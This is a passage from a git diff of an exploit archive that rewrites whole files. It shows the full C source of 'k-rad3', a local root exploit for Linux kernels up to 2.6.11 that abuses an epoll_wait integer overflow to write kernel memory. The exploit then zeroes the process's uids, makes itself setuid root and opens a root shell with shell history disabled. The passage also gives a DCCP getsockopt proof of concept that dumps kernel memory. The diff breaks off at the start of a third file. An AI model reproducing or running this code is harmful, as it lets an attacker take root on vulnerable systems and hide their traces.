- } - - } - } - - close(efd); - for (i = 3; i <= fd; i++) - close(i); - - return 0; - -} - -/* real-mode interrupt table fixup - point all interrupts to iret. -let's hope this will shut up apm */ -static void -fixint(char *buf) -{ -unsigned *tab = (void *) buf; -int i; - - for (i = 0; i < 256; i++) - tab[i] = 0x0000400; /* 0000:0400h */ - /* iret */ - buf[0x400] =0xcf; -} - -/* establish pte pointing to virtual addr 'addr' */ -static int -map_pte(unsigned base, int pagenr, unsigned addr) -{ - unsigned *buf = alloca(pagenr * 4096 + 8); - buf[(pagenr) * 1024] = MKPTE(addr); - buf[(pagenr) * 1024+1] = 0; - fixint((void *)buf); - return kwrite(base, (void *)buf, pagenr * 4096 + 4); -} - -/* make pme user can rw */ -static int -map_pme(unsigned base, int pagenr, unsigned addr) -{ - unsigned *buf = alloca(pagenr * 4096 + 32); - buf[(pagenr) * 1024] = MKPMD(addr); - buf[(pagenr) * 1024+1] = 0; - buf[(pagenr) * 1024+2] = MKPMD(addr)|0x00200000; - buf[(pagenr) * 1024+3] = 0; - fixint((void *)buf); - return kwrite(base, (void *)buf, pagenr * 4096 + 4*3); -} - - -static void -error(int d) -{ - printf(KRADM "y3r 422 12 n07 3r337 3nuPh!\n" KRAD "Try increase nrpages?\n"); - exit(1); -} - - char *bashargv[] = { KRADPS1, NULL }; - char *bashenvp[] = { "TERM=linux", "PS1=[\\u@"KRADPS1" \\W]\\$ ", "BASH_HISTORY=/dev/null", - "HISTORY=/dev/null", "history=/dev/null","HISTFILE=/dev/null", - "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin", NULL }; - -static int -exploit(unsigned kernelbase, int npages) -{ - struct idt *idt; - struct idtr idtr; - - - - signal(SIGSEGV, error); - signal(SIGBUS, error); - - - /* get idt descriptor addr */ - asm ("sidt %0" : "=m" (idtr)); - /* - * if OS in vmware , idtr.base is not right,please fix it - * [alert7@MagicLinux ~]$ cat /boot/System.map|grep idt_table - * c0461000 D idt_table - * //idtr.base = 0xc0461000; - */ - - printf("[+] idtr.base %p ,base %p\n",(void *)idtr.base , (void *)kernelbase); - - if ( !definePAE ) - { - map_pte(kernelbase, npages, idtr.base - kernelbase); - // idt = pae?(void *)MAP_PAE:(void *)MAP; - idt = (struct idt *)MAP; - }else - { - /* TODO: pse disable case */ - if ( !havepse) - printf("[!Waring!] TODO:CONFIG_X86_PAE define ,but cpu flag no pse\n"); - - map_pme(kernelbase, npages, idtr.base - kernelbase); - idt = (struct idt *) idtr.base; - } - -#if 0 - int * p = (int *) idt; - int i; - for (i=0;i<1024;i++,p++) - printf( "* %p 0x%x\n",p,*p); - fflush(stdout); -#endif - - /** - * cleanup the stuff to prevent others spotting the gate - * - must be done from ring 0 - */ - clear1 = (void *) &idt[0x7f]; - printf("[+] idt[0x7f] addr %p\n",clear1); - - if ( exploitway == 0) - { - SET_IDT_GATE(idt[0x7f], 3, idt[0x80].sel, ((unsigned long) &kcode)); - } - else - { - SET_IDT_GATE(idt[0x7f], 3, idt[0x80].sel, ((unsigned long) &stub)); - } - - //[2] SET_IDT_GATE(idt[0x7f], 3, idt[0x80].sel, ((unsigned long) &stub)); - /** - * also can use [2] stub function,but it may cause this message - * - * Sep 11 13:11:59 AD4 kernel: Debug: sleeping function called from invalid context at include/asm/uaccess.h:531 - * Sep 11 13:11:59 AD4 kernel: in_atomic():0[expected: 0], irqs_disabled():1 - * Sep 11 13:11:59 AD4 kernel: [] __might_sleep+0x7d/0x89 - * Sep 11 13:11:59 AD4 kernel: [] sys_capget+0x1d5/0x216 - * Sep 11 13:11:59 AD4 kernel: [] syscall_call+0x7/0xb - * Sep 11 13:11:59 AD4 kernel: [] pipe_writev+0x24/0x320 - * Sep 11 13:11:59 AD4 kernel: [] filp_close+0x59/0x5f - * - */ - - /* call raise_cap or kernel */ - asm ("int $0x7f"); - printf(KRADP "j00 1u(k7 k1d!\n"); - setresuid(0, 0, 0); - setresgid(0, 0, 0); - char cmdbuf[1024]; - snprintf(cmdbuf,1024,"chown root %s;chmod +s %s",progargv0,progargv0); - system(cmdbuf); - - execve("/bin/sh", bashargv, bashenvp); - exit(0); -} - - - -static void -usage(char *n) -{ - - printf("\nUsage: %s\n",n); - printf("\t-s forced cpu flag pse \n"); - printf("\t-a define CONFIG_X86_PAE,default none\n"); - printf("\t-e have two kernel code,default 0\n"); - printf("\t-p alloc pages(4k) ,default 1. Increase from 1 to 7\n" - "\t\tThe higher number the more likely it will crash\n"); - printf("\t-t default 0 \n" - "\t\t0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192\n"); - printf("\n"); - _exit(1); -} - - -/*read /proc/cpuinfo to set havepse*/ -static void -read_proc(void) -{ - FILE * fp; - char * line = NULL; - size_t len = 0; - ssize_t read; - printf("[+] try open /proc/cpuinfo .."); - fp = fopen("/proc/cpuinfo", "r"); - if (fp == NULL) - { - printf(" failed!!\n"); - return; - } - printf(" ok!!\n"); - - int cpus = 0; - int pse = 0; - while ((read = getline(&line, &len, fp)) != -1) - { - - if (strstr(line,"flags")) - { - if(strstr(line ,"pse ")) - { - pse ++; - } - } - - } - fclose(fp); - - if (line) - free(line); - - if ( pse ) - { - printf("[+] find cpu flag pse in /proc/cpuinfo\n"); - havepse = 1; - } - - return ; - -} - -static void -get_config(int ac, char **av) -{ - - uid = getuid(); - progargv0 = av[0]; - - int r; - - while(ac) { - r = getopt(ac, av, "e:p:t:ash"); - - if(r<0) break; - - switch(r) { - - case 's' : - //pse - havepse = 1; - break; - - case 'a' : - //define CONFIG_X86_PAE - definePAE = 1; - break; - - case 'e' : - exploitway = atoi(optarg); - if(exploitway<0) fatal("bad exploitway value"); - break; - - case 'p' : - npages = atoi(optarg); - break; - case 't' : - thread_size = atoi(optarg); - - break; - - case 'h' : - default: - usage(av[0]); - break; - } - } - - THREAD_SIZE_MASK = (thread_size==0)?(-4096):(-8192); - - read_proc(); -} - -static void -print_config(unsigned long kernebase) -{ - printf("[+] CONFIG_X86_PAE :%s\n", definePAE ?"ok":"none"); - printf("[+] Cpu flag: pse %s\n", havepse ?"ok":"none"); - printf("[+] Exploit Way : %d\n", exploitway); - printf("[+] Use %d pages (one page is 4K ),rewrite 0x%lx--(0x%lx + n)\n", - npages,kernebase,kernebase+npages*4 kB); - printf("[+] thread_size %d (0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192 \n",thread_size); - fflush(stdout); -} - - -void prepare(void) -{ - if (geteuid() == 0) - { - setresuid(0, 0, 0); - setresgid(0, 0, 0); - execve("/bin/sh", bashargv, bashenvp); - fatal("[-] Unable to spawn shell"); - } -} - -int -main(int argc, char **argv) -{ - char eater[65536]; - unsigned long kernelbase; - - /* unlink(argv[0]); */ - // sync(); - - printf(KRS " "KRADPS1" - <=linux 2.6.11 CPL 0 kernel exploit " KRE "\n" - KRS "Discovered Jan 2005 by sd " KRE "\n" - KRS "Modified 2005/9 by alert7 " KRE "\n"); - - if ( (unsigned long)eater > 0xc0000000) - { - printf("[!Waring!] TODO:use stack > 0xc0000000 \n"); - return 0; - } - - prepare(); - - get_config(argc,argv); - - kernelbase =(unsigned long)eater ; - kernelbase +=0x0fffffff; - kernelbase &=0xf0000000; - - print_config(kernelbase); - - exploit(kernelbase, npages<0?-npages:npages); - - return 0; - -} - -// milw0rm.com [2005-12-30] +/* +* k-rad3.c - linux 2.6.11 and below CPL 0 kernel local exploit v3 +* Discovered and original exploit coded Jan 2005 by sd +* +********************************************************************* +* +* Modified 2005/9 by alert7 +* XFOCUS Security Team http://www.xfocus.org +* +* gcc -o k-rad3 k-rad3.c -static -O2 +* +* tested succeed : +* on default installed RHEL4(2.6.9-5.EL and 2.6.9-5.ELsmp) +* 2.6.9-5.EL ./k-rad3 -p 2 +* 2.6.9-5.ELsmp ./k-rad3 -a -p 7 +* on default installed maglic linux 1.2 +* MagicLinux 2.6.9 #1 ./k-rad3 -t 1 -p 2 +* +* thank watercloud tested maglic linux 1.2 +* thank eist provide RHEL4 to test +* thank sd share his stuff. +* thank xfocus & xfocus's firends +* +* +* TODO: +* CASE 1: use stack > 0xc0000000 +* CASE 2: CONFIG_X86_PAE define ,but cpu flag no pse +* +*[alert7@MagicLinux ~]$ ./k-rad3 -h +*[ k-rad3 - <=linux 2.6.11 CPL 0 kernel exploit ] +*[ Discovered Jan 2005 by sd ] +*[ Modified 2005/9 by alert7 ] +* +*Usage: ./k-rad3 +* -s forced cpu flag pse +* -a define CONFIG_X86_PAE,default none +* -e have two kernel code,default 0 +* -p alloc pages(4k) ,default 1. Increase from 1 to 7 +* The higher number the more likely it will crash +* -t default 0 +* 0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192 +* +*[alert7@MagicLinux ~]$ ./k-rad3 -t 1 -p 2 +*[ k-rad3 - <=linux 2.6.11 CPL 0 kernel exploit ] +*[ Discovered Jan 2005 by sd ] +*[ Modified 2005/9 by alert7 ] +*[+] try open /proc/cpuinfo .. ok!! +*[+] find cpu flag pse in /proc/cpuinfo +*[+] CONFIG_X86_PAE :none +*[+] Cpu flag: pse ok +*[+] Exploit Way : 0 +*[+] Use 2 pages (one page is 4K ),rewrite 0xc0000000--(0xc0002000 + n) +*[+] thread_size 1 (0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192 +*[+] idtr.base 0xc0461000 ,base 0xc0000000 +*[+] kwrite base 0xc0000000, buf 0xbffed750,num 8196 +*[+] idt[0x7f] addr 0xffc003f8 +*[+] j00 1u(k7 k1d! +*[root@k-rad3 ~] #id +*uid=0(root) gid=0(root) groups=500(alert7) +* +* +* Linux Kernel <= 2.6.11 "sys_epoll_wait" Local integer overflow Exploit +* +* "it is possible to partially overwrite low kernel ( >= 2.6 <= 2.6.11) +* memory due to integer overflow in sys_epoll_wait and misuse of +* __put_user in ep_send_events" +* Georgi Guninski: http://seclists.org/lists/fulldisclosure/2005/Mar/0293.html +* +********************************************************************* +* +* +* In memory of pwned.c (uselib) +* +* - Redistributions of source code is not permitted. +* - Redistributions in the binary form is not permitted. +* - Redistributions of the above copyright notice, this list of conditions, +* and the following disclaimer is permitted. +* - By proceeding to a Redistribution and under any form of the Program +* the Distributor is granting ownership of his Resources without +* limitations to the copyright holder(s). +* +* +* Since we already owned everyone, theres no point keeping this private +* anymore. +* +* http://seclists.org/lists/fulldisclosure/2005/Mar/0293.html +* +* Thanks to our internet hero georgi guninski for being such incredible +* whitehat disclosing one of the most reliable kernel bugs. +* You saved the world, man, we owe you one! +* +* This version is somewhat broken, but skilled reader will get an idea. +* Well, at least let the scriptkids have fun for a while. +* +* Thanks to all who helped me developing/testing this, you know who you are, +* and especially to my gf for guidance while coding this. +* +*/ + +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#ifndef __USE_GNU + #define __USE_GNU +#endif +#include +#include +#include +#include + +/** + * Relationship Variables + * + * 1: CONFIG_X86_PAE + * see /lib/modules/`uname -r`/build/.config + * 1.1: pse + * 2: THREAD_SIZE + * see include/asm/thread_info.h THREAD_SIZE define + */ + + +#define MAP (0xfffff000 - (1023*4096)) +#define MAP_PAE (0xfffff000 - (511*4096)) +#define MKPTE(addr) ((addr & (~4095)) | 0x27) +#define MKPMD(x) (0x1e3|0x004) + +//////////////////////////////////////////////// + +#define KRADPS1 "k-rad3" + +#define kB * 1024 +#define MB * 1024 kB +#define GB * 1024 MB + +#define KRS "\033[1;30m[ \033[1;37m" +#define KRE "\033[1;30m ]\033[0m" +#define KRAD "\033[1;30m[\033[1;37m*\033[1;30m]\033[0m " +#define KRADP "\033[1;30m[\033[1;37m+\033[1;30m]\033[0m " +#define KRADM "\033[1;30m[\033[1;37m-\033[1;30m]\033[0m " + +#define SET_IDT_GATE(idt,ring,s,addr) \ + (idt).off1 = addr & 0xffff; \ + (idt).off2 = addr >> 16; \ + (idt).sel = s; \ + (idt).none = 0; \ + (idt).flags = 0x8E | (ring << 5); + +//config val +static int havepse = 0; +static int definePAE = 0; +static int exploitway = 0; +static int npages = 1; +static int thread_size = 0; + + +static uid_t uid = 0; +static unsigned long long *clear1; +static char * progargv0; + +struct idtr { + unsigned short limit; + unsigned int base; +} __attribute__ ((packed)); + +struct idt { + unsigned short off1; + unsigned short sel; + unsigned char none,flags; + unsigned short off2; +} __attribute__ ((packed)); + + + +#define __syscall_return(type, res) \ +do { \ + if ((unsigned long)(res) >= (unsigned long)(-125)) { \ + errno = -(res); \ + res = -1; \ + } \ + return (type) (res); \ +} while (0) + + +#define _capget_macro(type,name,type1,arg1,type2,arg2) \ + type name(type1 arg1,type2 arg2) \ + { \ + long __res; \ + __asm__ volatile ( "int $0x80" \ + : "=a" (__res) \ + : "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2))); \ + __syscall_return(type,__res); \ + } + +static inline _capget_macro(int,capget,void *,a,void *,b); + +static int THREAD_SIZE_MASK =(-4096); + + +static void +fatal(const char *message) +{ + system("uname -a"); + printf("[-] %s\n",message); + exit(1); +} + +void kernel(unsigned * task) +{ + unsigned * addr = task; + /* looking for uids */ + + *clear1 = 0; + + while (addr[0] != uid || addr[1] != uid || + addr[2] != uid || addr[3] != uid + ) + addr++; + + addr[0] = addr[1] = addr[2] = addr[3] = 0; /* set uids */ + addr[4] = addr[5] = addr[6] = addr[7] = 0; /* set gids */ + +} + +void kcode(void); +void __kcode(void) +{ + asm( + "kcode: \n" + "cld \n" + " pusha \n" + " pushl %es \n" + " pushl %ds \n" + " movl %ss,%edx \n" + " movl %edx,%es \n" + " movl %edx,%ds \n"); + __asm__("movl %0 ,%%eax" ::"m"(THREAD_SIZE_MASK) ); + asm( + " andl %esp,%eax \n" + " pushl (%eax) \n" + " call kernel \n" + " addl $4, %esp \n" + " popl %ds \n" + " popl %es \n" + " popa \n" + " cli \n" + " iret \n" + ); +} + + +void raise_cap(unsigned long *ts) +{ +/* must be on lower addresses because of kernel arg check :) */ +static struct __user_cap_header_struct head; +static struct __user_cap_data_struct data; +static struct __user_cap_data_struct n; + +int i; + +*clear1 = 0; +head.version = 0x19980330; +head.pid = 0; +capget(&head, &data); +/* scan the thread_struct */ +for (i = 0; i < 512; i++, ts++) +{ + /* is it capabilities block? */ + if ( (ts[0] == data.effective) && + (ts[1] == data.inheritable) && + (ts[2] == data.permitted)) + { + /* set effective cap to some val */ + ts[0] = 0x12341234; + capget(&head, &n); + /* and test if it has changed */ + if (n.effective == ts[0]) + { + /* if so, we're in :) */ + ts[0] = ts[1] = ts[2] = 0xffffffff; + return; + } + /* otherwise fix back the stuff + (if we've not crashed already :) */ + ts[0] = data.effective; + } +} +return; +} + + +void stub(void); +void __stub(void) +{ + asm ( + "stub:;" + " pusha;" + ); + __asm__("movl %0 ,%%eax" ::"m"(THREAD_SIZE_MASK) ); + asm( + " and %esp, %eax;" + " pushl (%eax);" + " call raise_cap;" + " pop %eax;" + " popa;" + " iret;" + ); + +} + + +/* write to kernel from buf, num bytes */ +static int +kwrite(unsigned base, char *buf, int num) +{ +#define DIV 256 +#define RES 4 + +int efd, c, i, fd; +int pi[2]; +struct epoll_event ev; +int *stab; +unsigned long ptr; +int count; +unsigned magic = 0xffffffff / 12 + 1; + + printf("[+] kwrite base %p, buf %p,num %d\n", (void *)base,buf,num); + /* initialize epoll */ + efd = epoll_create(4096); + if (efd < 0) + return -1; + + ev.events = EPOLLIN|EPOLLOUT|EPOLLPRI|EPOLLERR|EPOLLHUP; + + /* 12 bytes per fd + one more to be safely in stack space */ + count = (num+11)/12+RES; + + /* desc array */ + stab = alloca((count+DIV-1)/DIV*sizeof(int)); + + for (i = 0; i < ((count+DIV-1)/DIV)+1; i++) + { + + if (socketpair(AF_UNIX, SOCK_DGRAM, 0, pi) < 0) + return -1; + + send(pi[0], "a", 1, 0); + stab[i] = pi[1]; + } + + /* highest fd and first descriptor */ + fd = pi[1]; + /* we've to allocate this separately because we need to have + it's fd preserved - using this we'll be writing actual bytes */ + epoll_ctl(efd, EPOLL_CTL_ADD, fd, &ev); + //printf("EPOLL_CTL_ADD count %u\n",count); + for (i = 0, c = 0; i < (count-1); i++) + { + int n; + n = dup2(stab[i/DIV], fd+2+(i % DIV)); + if (n < 0) + return -1; + epoll_ctl(efd, EPOLL_CTL_ADD, n, &ev); + close(n); + } + + /* in 'n' we've the latest fd we're using to write data */ + for (i = 0; i < ((num+7)/8); i++) + { + /* data being written from end */ + memcpy(&ev.data, buf + num - 8 - i * 8, 8); + epoll_ctl(efd, EPOLL_CTL_MOD, fd, &ev); + + /* the actual kernel magic */ + ptr = (base + num - (i*8)) - (count * 12); + struct epoll_event *events =(struct epoll_event *)ptr; + //printf("epoll_wait verify_area(%p,%p) addr %p %p\n",ptr,magic* sizeof(struct epoll_event) ,&events[0].events,magic); + int iret =epoll_wait(efd, (void *) ptr, magic, 31337); + if (iret ==-1) + { + perror("epoll_wait"); + fatal("This kernel not vulnerability!!!"); + + } + /* don't ask why (rotten rb-trees) :) */ + if (i) + { + //printf("epoll_wait verify_area(%p,%p) %p\n",ptr,magic* sizeof(struct epoll_event) ,magic); + iret = epoll_wait(efd, (void *)ptr, magic, 31337); + if (iret ==-1) + { + perror("epoll_wait"); + fatal("This kernel not vulnerability!!!"); + + } + + } + } + + close(efd); + for (i = 3; i <= fd; i++) + close(i); + + return 0; + +} + +/* real-mode interrupt table fixup - point all interrupts to iret. +let's hope this will shut up apm */ +static void +fixint(char *buf) +{ +unsigned *tab = (void *) buf; +int i; + + for (i = 0; i < 256; i++) + tab[i] = 0x0000400; /* 0000:0400h */ + /* iret */ + buf[0x400] =0xcf; +} + +/* establish pte pointing to virtual addr 'addr' */ +static int +map_pte(unsigned base, int pagenr, unsigned addr) +{ + unsigned *buf = alloca(pagenr * 4096 + 8); + buf[(pagenr) * 1024] = MKPTE(addr); + buf[(pagenr) * 1024+1] = 0; + fixint((void *)buf); + return kwrite(base, (void *)buf, pagenr * 4096 + 4); +} + +/* make pme user can rw */ +static int +map_pme(unsigned base, int pagenr, unsigned addr) +{ + unsigned *buf = alloca(pagenr * 4096 + 32); + buf[(pagenr) * 1024] = MKPMD(addr); + buf[(pagenr) * 1024+1] = 0; + buf[(pagenr) * 1024+2] = MKPMD(addr)|0x00200000; + buf[(pagenr) * 1024+3] = 0; + fixint((void *)buf); + return kwrite(base, (void *)buf, pagenr * 4096 + 4*3); +} + + +static void +error(int d) +{ + printf(KRADM "y3r 422 12 n07 3r337 3nuPh!\n" KRAD "Try increase nrpages?\n"); + exit(1); +} + + char *bashargv[] = { KRADPS1, NULL }; + char *bashenvp[] = { "TERM=linux", "PS1=[\\u@"KRADPS1" \\W]\\$ ", "BASH_HISTORY=/dev/null", + "HISTORY=/dev/null", "history=/dev/null","HISTFILE=/dev/null", + "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin", NULL }; + +static int +exploit(unsigned kernelbase, int npages) +{ + struct idt *idt; + struct idtr idtr; + + + + signal(SIGSEGV, error); + signal(SIGBUS, error); + + + /* get idt descriptor addr */ + asm ("sidt %0" : "=m" (idtr)); + /* + * if OS in vmware , idtr.base is not right,please fix it + * [alert7@MagicLinux ~]$ cat /boot/System.map|grep idt_table + * c0461000 D idt_table + * //idtr.base = 0xc0461000; + */ + + printf("[+] idtr.base %p ,base %p\n",(void *)idtr.base , (void *)kernelbase); + + if ( !definePAE ) + { + map_pte(kernelbase, npages, idtr.base - kernelbase); + // idt = pae?(void *)MAP_PAE:(void *)MAP; + idt = (struct idt *)MAP; + }else + { + /* TODO: pse disable case */ + if ( !havepse) + printf("[!Waring!] TODO:CONFIG_X86_PAE define ,but cpu flag no pse\n"); + + map_pme(kernelbase, npages, idtr.base - kernelbase); + idt = (struct idt *) idtr.base; + } + +#if 0 + int * p = (int *) idt; + int i; + for (i=0;i<1024;i++,p++) + printf( "* %p 0x%x\n",p,*p); + fflush(stdout); +#endif + + /** + * cleanup the stuff to prevent others spotting the gate + * - must be done from ring 0 + */ + clear1 = (void *) &idt[0x7f]; + printf("[+] idt[0x7f] addr %p\n",clear1); + + if ( exploitway == 0) + { + SET_IDT_GATE(idt[0x7f], 3, idt[0x80].sel, ((unsigned long) &kcode)); + } + else + { + SET_IDT_GATE(idt[0x7f], 3, idt[0x80].sel, ((unsigned long) &stub)); + } + + //[2] SET_IDT_GATE(idt[0x7f], 3, idt[0x80].sel, ((unsigned long) &stub)); + /** + * also can use [2] stub function,but it may cause this message + * + * Sep 11 13:11:59 AD4 kernel: Debug: sleeping function called from invalid context at include/asm/uaccess.h:531 + * Sep 11 13:11:59 AD4 kernel: in_atomic():0[expected: 0], irqs_disabled():1 + * Sep 11 13:11:59 AD4 kernel: [] __might_sleep+0x7d/0x89 + * Sep 11 13:11:59 AD4 kernel: [] sys_capget+0x1d5/0x216 + * Sep 11 13:11:59 AD4 kernel: [] syscall_call+0x7/0xb + * Sep 11 13:11:59 AD4 kernel: [] pipe_writev+0x24/0x320 + * Sep 11 13:11:59 AD4 kernel: [] filp_close+0x59/0x5f + * + */ + + /* call raise_cap or kernel */ + asm ("int $0x7f"); + printf(KRADP "j00 1u(k7 k1d!\n"); + setresuid(0, 0, 0); + setresgid(0, 0, 0); + char cmdbuf[1024]; + snprintf(cmdbuf,1024,"chown root %s;chmod +s %s",progargv0,progargv0); + system(cmdbuf); + + execve("/bin/sh", bashargv, bashenvp); + exit(0); +} + + + +static void +usage(char *n) +{ + + printf("\nUsage: %s\n",n); + printf("\t-s forced cpu flag pse \n"); + printf("\t-a define CONFIG_X86_PAE,default none\n"); + printf("\t-e have two kernel code,default 0\n"); + printf("\t-p alloc pages(4k) ,default 1. Increase from 1 to 7\n" + "\t\tThe higher number the more likely it will crash\n"); + printf("\t-t default 0 \n" + "\t\t0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192\n"); + printf("\n"); + _exit(1); +} + + +/*read /proc/cpuinfo to set havepse*/ +static void +read_proc(void) +{ + FILE * fp; + char * line = NULL; + size_t len = 0; + ssize_t read; + printf("[+] try open /proc/cpuinfo .."); + fp = fopen("/proc/cpuinfo", "r"); + if (fp == NULL) + { + printf(" failed!!\n"); + return; + } + printf(" ok!!\n"); + + int cpus = 0; + int pse = 0; + while ((read = getline(&line, &len, fp)) != -1) + { + + if (strstr(line,"flags")) + { + if(strstr(line ,"pse ")) + { + pse ++; + } + } + + } + fclose(fp); + + if (line) + free(line); + + if ( pse ) + { + printf("[+] find cpu flag pse in /proc/cpuinfo\n"); + havepse = 1; + } + + return ; + +} + +static void +get_config(int ac, char **av) +{ + + uid = getuid(); + progargv0 = av[0]; + + int r; + + while(ac) { + r = getopt(ac, av, "e:p:t:ash"); + + if(r<0) break; + + switch(r) { + + case 's' : + //pse + havepse = 1; + break; + + case 'a' : + //define CONFIG_X86_PAE + definePAE = 1; + break; + + case 'e' : + exploitway = atoi(optarg); + if(exploitway<0) fatal("bad exploitway value"); + break; + + case 'p' : + npages = atoi(optarg); + break; + case 't' : + thread_size = atoi(optarg); + + break; + + case 'h' : + default: + usage(av[0]); + break; + } + } + + THREAD_SIZE_MASK = (thread_size==0)?(-4096):(-8192); + + read_proc(); +} + +static void +print_config(unsigned long kernebase) +{ + printf("[+] CONFIG_X86_PAE :%s\n", definePAE ?"ok":"none"); + printf("[+] Cpu flag: pse %s\n", havepse ?"ok":"none"); + printf("[+] Exploit Way : %d\n", exploitway); + printf("[+] Use %d pages (one page is 4K ),rewrite 0x%lx--(0x%lx + n)\n", + npages,kernebase,kernebase+npages*4 kB); + printf("[+] thread_size %d (0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192 \n",thread_size); + fflush(stdout); +} + + +void prepare(void) +{ + if (geteuid() == 0) + { + setresuid(0, 0, 0); + setresgid(0, 0, 0); + execve("/bin/sh", bashargv, bashenvp); + fatal("[-] Unable to spawn shell"); + } +} + +int +main(int argc, char **argv) +{ + char eater[65536]; + unsigned long kernelbase; + + /* unlink(argv[0]); */ + // sync(); + + printf(KRS " "KRADPS1" - <=linux 2.6.11 CPL 0 kernel exploit " KRE "\n" + KRS "Discovered Jan 2005 by sd " KRE "\n" + KRS "Modified 2005/9 by alert7 " KRE "\n"); + + if ( (unsigned long)eater > 0xc0000000) + { + printf("[!Waring!] TODO:use stack > 0xc0000000 \n"); + return 0; + } + + prepare(); + + get_config(argc,argv); + + kernelbase =(unsigned long)eater ; + kernelbase +=0x0fffffff; + kernelbase &=0xf0000000; + + print_config(kernelbase); + + exploit(kernelbase, npages<0?-npages:npages); + + return 0; + +} + +// milw0rm.com [2005-12-30] diff --git a/platforms/linux/local/3587.c b/platforms/linux/local/3587.c index c0fcafe3a..9c3032df1 100755 --- a/platforms/linux/local/3587.c +++ b/platforms/linux/local/3587.c @@ -1,114 +1,114 @@ -/* -Linux Kernel DCCP Memory Disclosure Vulnerability - -Synopsis: - - The Linux kernel is susceptible to a locally exploitable flaw - which may allow local users to steal data from the kernel memory. - -Vulnerable Systems: - - Linux Kernel Versions: >= 2.6.20 with DCCP support enabled. - Kernel versions <2.6.20 lack - DCCP_SOCKOPT_SEND_CSCOV/DCCP_SOCKOPT_RECV_CSCOV optnames for - getsockopt() call with SOL_DCCP level, which are used in the - delivered POC code. - -Author: - - Robert Swiecki - http://www.swiecki.net - robert@swiecki.net - -Details: - - The flaw exists in do_dccp_getsockopt() function in - net/dccp/proto.c file. - ------------------------ -static int do_dccp_getsockopt(struct sock *sk, int level, int optname, - char __user *optval, int __user *optlen) -... -if (get_user(len, optlen)) - return -EFAULT; -if (len < sizeof(int)) - return -EINVAL; -... ------------------------ - - The above code doesn't check `len' variable for negative values. - Because of cast typing (len < sizeof(int)) is always true for - `len' values less than 0. - - After that copy_to_user() procedure is called: - ------------------------ -if (put_user(len, optlen) || copy_to_user(optval, &val, len)) - return -EFAULT; ------------------------ - - What happens next depends greatly on the cpu architecture in-use - - each cpu architecture has its own copy_to_user() implementation. On - the IA-32 the code below ... - ------------------------ -unsigned long -copy_to_user(void __user *to, const void *from, unsigned long n) -{ - BUG_ON((long) n < 0); ------------------------ - - ... will prevent explotation, but kernel will oops due to - invalid opcode in BUG_ON(). - - On some other architectures (e.g. x86-64) kernel-space data will - be copied to the user supplied buffer until end-of-kernel space - (pagefault in kernel-mode occurs) is reached. - -POC: - ------------------------ */ - -#include -#include -#include -#include -#include -#include -#include - -#define BUFSIZE 0x10000000 - -int main(int argc, char *argv[]) -{ - void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE, - MAP_ANONYMOUS | MAP_PRIVATE, 0, 0); - if (!mem) { - printf("Cannot allocate mem\n"); - return 1; - } - /* SOCK_DCCP, IPPROTO_DCCP */ - int s = socket(PF_INET, 6, 33); - if (s == -1) { - fprintf(stderr, "socket failure!\n"); - return 1; - } - int len = -1; - /* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV */ - int x = getsockopt(s, 269, 11, mem, &len); - - if (x == -1) - perror("SETSOCKOPT"); - else - printf("SUCCESS\n"); - - write(1, mem, BUFSIZE); - - return 0; -} - -//----------------------- -//make poc; ./poc | strings -//----------------------- - -// milw0rm.com [2007-03-27] +/* +Linux Kernel DCCP Memory Disclosure Vulnerability + +Synopsis: + + The Linux kernel is susceptible to a locally exploitable flaw + which may allow local users to steal data from the kernel memory. + +Vulnerable Systems: + + Linux Kernel Versions: >= 2.6.20 with DCCP support enabled. + Kernel versions <2.6.20 lack + DCCP_SOCKOPT_SEND_CSCOV/DCCP_SOCKOPT_RECV_CSCOV optnames for + getsockopt() call with SOL_DCCP level, which are used in the + delivered POC code. + +Author: + + Robert Swiecki + http://www.swiecki.net + robert@swiecki.net + +Details: + + The flaw exists in do_dccp_getsockopt() function in + net/dccp/proto.c file. + +----------------------- +static int do_dccp_getsockopt(struct sock *sk, int level, int optname, + char __user *optval, int __user *optlen) +... +if (get_user(len, optlen)) + return -EFAULT; +if (len < sizeof(int)) + return -EINVAL; +... +----------------------- + + The above code doesn't check `len' variable for negative values. + Because of cast typing (len < sizeof(int)) is always true for + `len' values less than 0. + + After that copy_to_user() procedure is called: + +----------------------- +if (put_user(len, optlen) || copy_to_user(optval, &val, len)) + return -EFAULT; +----------------------- + + What happens next depends greatly on the cpu architecture in-use - + each cpu architecture has its own copy_to_user() implementation. On + the IA-32 the code below ... + +----------------------- +unsigned long +copy_to_user(void __user *to, const void *from, unsigned long n) +{ + BUG_ON((long) n < 0); +----------------------- + + ... will prevent explotation, but kernel will oops due to + invalid opcode in BUG_ON(). + + On some other architectures (e.g. x86-64) kernel-space data will + be copied to the user supplied buffer until end-of-kernel space + (pagefault in kernel-mode occurs) is reached. + +POC: + +----------------------- */ + +#include +#include +#include +#include +#include +#include +#include + +#define BUFSIZE 0x10000000 + +int main(int argc, char *argv[]) +{ + void *mem = mmap(0, BUFSIZE, PROT_READ | PROT_WRITE, + MAP_ANONYMOUS | MAP_PRIVATE, 0, 0); + if (!mem) { + printf("Cannot allocate mem\n"); + return 1; + } + /* SOCK_DCCP, IPPROTO_DCCP */ + int s = socket(PF_INET, 6, 33); + if (s == -1) { + fprintf(stderr, "socket failure!\n"); + return 1; + } + int len = -1; + /* SOL_DCCP, DCCP_SOCKOPT_SEND_CSCOV */ + int x = getsockopt(s, 269, 11, mem, &len); + + if (x == -1) + perror("SETSOCKOPT"); + else + printf("SUCCESS\n"); + + write(1, mem, BUFSIZE); + + return 0; +} + +//----------------------- +//make poc; ./poc | strings +//----------------------- + +// milw0rm.com [2007-03-27] diff --git a/platforms/linux/local/9363.c b/platforms/linux/local/9363.c index e5249b54a..01dfaded8 100755 --- a/platforms/linux/local/9363.c +++ b/platforms/linux/local/9363.c @@ -1,197 +1,197 @@ -/* - * cve-2005-4605.c - * - * Linux Kernel < 